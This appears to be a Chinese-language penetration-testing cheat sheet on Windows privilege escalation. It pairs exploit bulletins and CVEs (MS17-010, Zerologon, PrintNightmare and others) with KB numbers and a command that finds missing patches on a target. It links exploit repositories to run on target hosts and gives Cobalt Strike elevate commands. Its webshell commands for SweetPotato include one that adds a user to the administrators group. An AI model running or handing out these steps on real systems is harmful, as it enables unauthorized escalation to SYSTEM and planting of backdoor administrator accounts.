权限提升-Windows

张天师大约 2 分钟

漏洞代号补丁编号适用平台用途
MS14-058KB300006103/08/12/Win7本地提权
MS15-051KB305719103/08/12/Win7本地提权
MS16-032KB314314108/12/Win7本地提权
MS16-135KB319823408/12/16/Win7/Win10本地提权
MS16-016KB313517308/Win7本地提权
MS17-010KB401338903/08/12/16/win7远程注入dll
CVE-2020-0787KB4541505Windows全版本提权本地提权
MS14-068KB3011780域控未安装补丁的域内,03,08,12域内提权
CVE-2020-1472KB4571723Zerologon(03/08/12/16/19)域内提权
CVE-2021-1675KB5003671打印机漏洞-域提权(16/19)域内提权
CVE-2021-34527KB5003681打印机漏洞-域提权(16/19)域内提权
CVE-2021-42287KB5008380Server 2008 - 2022域内提权
CVE-2022-21882Windows Server 10 11

检测未打的补丁

systeminfo > temp.txt&(for %i in(KB3000061 KB3057191 KB3143141 KB3198234 KB3135173 KB4013389 KB4541505 KB3011780 KB4571723 KB5003671 KB5003681 KB5008380) do@type temp.txt|@find /i  "%i"|| @echo %i Not Installed!)&del /f /q /a temp.txt

补丁号根据自己需求加,利用MSF中有相关EXP或者自行搜索 Github、searchsploitopen in new window

CVE-2020-0787

直接下载EXP到目标主机上执行(需要上桌面,会弹出一个system权限的cmd窗口)

https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSIONopen in new window

二:利用Cobalt Strike提权

CobaltStrike附带了一些绕过UAC的攻击,但如果当前用户不是管理员(Administrator), 攻击会失效。

Beacon默认回连时间(心跳时间)为60秒,为了更快的渗透修改成32秒。

1、普通用户->系统管理员

如果你是普通本地用户权限,用以下命令提升到高权限

注意:如果是域用户会弹出认证窗口,不能提权

elevate uac-token-duplication test1(这个是你的监听器)

然后可以用svc-exe再提权到SYSTEM

2、系统管理员->系统权限

如果你有一个Administrator权限的Beacon,用以下命令提升到SYSTEM权限:

这个需要创建服务

elevate svc-exe test1

三:C#版的烂土豆

项目地址: https://github.com/uknowsec/SweetPotatoopen in new window (实测win7、08、12等可用)

直接在Webshell下执行

SweetPotato.exe -a whoami
SweetPotato.exe -a "net localgroup administrators test /add"